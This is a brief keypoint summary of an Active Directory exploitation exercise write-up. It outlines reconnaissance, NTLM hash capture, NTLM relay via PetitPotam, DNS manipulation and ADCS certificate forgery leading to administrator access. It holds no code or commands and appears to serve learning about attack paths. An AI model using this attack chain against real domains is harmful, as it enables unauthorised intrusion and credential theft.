This article provides a detailed write-up on a recent Active Directory exploitation exercise. The author, known as Maverick, shares their experiences and methods used for exploiting vulnerabilities such as NTLM relay attacks, credential dumping, and privilege escalation within a Windows environment. The write-up includes steps taken to gain access, perform reconnaissance, exploit SMB shares, capture NTLM hashes, and escalate privileges through various attack vectors. Affected: Active Directory, SMB, Windows environment
Keypoints :
- Maverick returns with another Active Directory write-up focused on infrastructure hacking.
- Utilizes tools like Nmap to scan for open ports and services on target machines DC01 and WS01.
- Enumerates SMB shares on both machines to find potential attack vectors.
- Successfully captures an NTLM hash for the user KATHRYN.SPENCER.
- Validates captured credentials across multiple services including SMB and WinRM.
- Discovers a vulnerable AD Certificate Services (ADCS) configuration for potential exploitation.
- Employs techniques such as NTLM relay attacks and PetitPotam to escalate privileges.
- Manipulates the domain’s DNS records to facilitate the attacks.
- Gains administrator access by leveraging a successfully forged certificate with relevant privileges.
- Highlights the importance of AD mapping with tools like BloodHound for understanding attack paths and vulnerabilities.